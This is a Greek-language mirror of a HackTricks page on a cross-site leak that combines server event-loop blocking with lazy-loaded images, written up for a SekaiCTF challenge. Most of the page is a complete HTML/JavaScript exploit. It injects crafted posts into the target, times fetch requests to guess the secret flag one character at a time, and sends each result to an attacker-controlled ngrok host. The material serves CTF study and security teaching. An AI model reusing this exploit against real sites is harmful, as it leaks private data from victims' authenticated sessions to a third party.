mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
9.5 KiB
9.5 KiB
Φραγή του Συνόλου Εκδηλώσεων + Τεμπέλικες εικόνες
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
- Εργάζεστε σε μια εταιρεία κυβερνοασφάλειας; Θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks; Ή θέλετε να έχετε πρόσβαση στην τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF; Ελέγξτε τα ΠΑΚΕΤΑ ΣΥΝΔΡΟΜΗΣ!
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε με στο Twitter 🐦@carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στο αποθετήριο hacktricks και αποθετήριο hacktricks-cloud.
Σε αυτήν την εκμετάλλευση, ο @aszx87410 συνδυάζει την τεχνική του πλευρικού καναλιού εικόνας τεμπέλικων με μια τεχνική φραγής του συνόλου εκδηλώσεων για να διαρρεύσει χαρακτήρες.
Αυτή είναι μια διαφορετική εκμετάλλευση για το CTF chall που ήδη σχολιάστηκε στην ακόλουθη σελίδα. Ρίξτε μια ματιά για περισσότερες πληροφορίες σχετικά με την πρόκληση:
{% content-ref url="connection-pool-example.md" %} connection-pool-example.md {% endcontent-ref %}
Η ιδέα πίσω από αυτήν την εκμετάλλευση είναι:
- Οι αναρτήσεις φορτώνονται αλφαβητικά
- Ένας επιτιθέμενος μπορεί να ενθέσει μια ανάρτηση που ξεκινά με το "A", στη συνέχεια κάποια ετικέτα HTML (όπως ένα μεγάλο
<canvas
) θα καλύψει την πλειοψηφία της οθόνης και μερικές τελικές ετικέτες<img lazy
για να φορτώσει πράγματα. - Αντί για ένα "A", ο επιτιθέμενος ενθέτει την ίδια ανάρτηση αλλά ξεκινώντας με ένα "z". Η ανάρτηση με τη σημαία θα εμφανιστεί πρώτη, στη συνέχεια η ενθετημένη ανάρτηση θα εμφανιστεί με το αρχικό "z" και το μεγάλο canvas. Επειδή η ανάρτηση με τη σημαία εμφανίστηκε πρώτη, το πρώτο καμβά θα καταλάβει ολόκληρη την οθόνη και οι τελικές ετικέτες
<img lazy
που ενθέτιστηκαν δεν θα φαίνονται στην οθόνη, οπότε δεν θα φορτωθούν. - Στη συνέχεια, ενώ το bot έχει πρόσβαση στη σελίδα, ο επιτιθέμενος θα στείλει αιτήσεις fetch.
- Αν οι εικόνες που ενθέτονται στην ανάρτηση φορτώνονται, αυτές οι αιτήσεις fetch θα διαρκέσουν περισσότερο χρόνο, οπότε ο επιτιθέμενος γνωρίζει ότι η ανάρτηση βρίσκεται πριν τη σημαία (αλφαβητικά).
- Αν οι αιτήσεις fetch είναι γρήγορες, σημαίνει ότι η ανάρτηση βρίσκεται αλφαβητικά μετά τη σημαία.
Ας ελέγξουμε τον κώδικα:
<!DOCTYPE html>
<html>
<!--
The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster.
By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
We can use fetch to measure the request time.
-->
<body>
<button onclick="run()">start</button>
<!-- Inject post with payload -->
<form id=f action="http://localhost:1234/create" method="POST" target="_blank">
<input id=inp name="text" value="">
</form>
<!-- Remove index -->
<form id=f2 action="http://localhost:1234/remove" method="POST" target="_blank">
<input id=inp2 name="index" value="">
</form>
<script>
let flag = 'SEKAI{'
const TARGET = 'https://safelist.ctf.sekai.team'
f.action = TARGET + '/create'
f2.action = TARGET + '/remove'
const sleep = ms => new Promise(r => setTimeout(r, ms))
// Function to leak info to attacker
const send = data => fetch('http://server.ngrok.io?d='+data)
const charset = 'abcdefghijklmnopqrstuvwxyz'.split('')
// start exploit
let count = 0
setTimeout(async () => {
let L = 0
let R = charset.length - 1
// I have omited code here as apparently it wasn't necesary
// fallback to linerar since I am not familiar with binary search lol
for(let i=R; i>=L; i--) {
let c = charset[i]
send('try_' + flag + c)
const found = await testChar(flag + c)
if (found) {
send('found: '+ flag+c)
flag += c
break
}
}
}, 0)
async function testChar(str) {
return new Promise(resolve => {
/*
For 3350, you need to test it on your local to get this number.
The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.
*/
// <canvas height="3350px"> is experimental and allow to show the injected
// images when the post injected is the first one but to hide them when
// the injected post is after the post with the flag
inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
f.submit()
setTimeout(() => {
run(str, resolve)
}, 500)
})
}
async function run(str, resolve) {
// Open posts page 5 times
for(let i=1; i<=5;i++) {
window.open(TARGET)
}
let t = 0
const round = 30 //Lets time 30 requests
setTimeout(async () => {
// Send 30 requests and time each
for(let i=0; i<round; i++) {
let s = performance.now()
await fetch(TARGET + '/?test', {
mode: 'no-cors'
}).catch(err=>1)
let end = performance.now()
t += end - s
console.log(end - s)
}
const avg = t/round
// Send info about how much time it took
send(str + "," + t + "," + "avg:" + avg)
/*
I get this threshold(1000ms) by trying multiple times on remote admin bot
for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
*/
const isFound = (t >= 1000)
if (isFound) {
inp2.value = "0"
} else {
inp2.value = "1"
}
// remember to delete the post to not break our leak oracle
f2.submit()
setTimeout(() => {
resolve(isFound)
}, 200)
}, 200)
}
</script>
</body>
</html>
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
- Εργάζεστε σε μια εταιρεία κυβερνοασφάλειας; Θέλετε να δείτε τη εταιρεία σας να διαφημίζεται στο HackTricks; Ή θέλετε να έχετε πρόσβαση στη τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF; Ελέγξτε τα ΠΑΚΕΤΑ ΣΥΝΔΡΟΜΗΣ!
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Συμμετάσχετε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε με στο Twitter 🐦@carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στο αποθετήριο hacktricks και αποθετήριο hacktricks-cloud.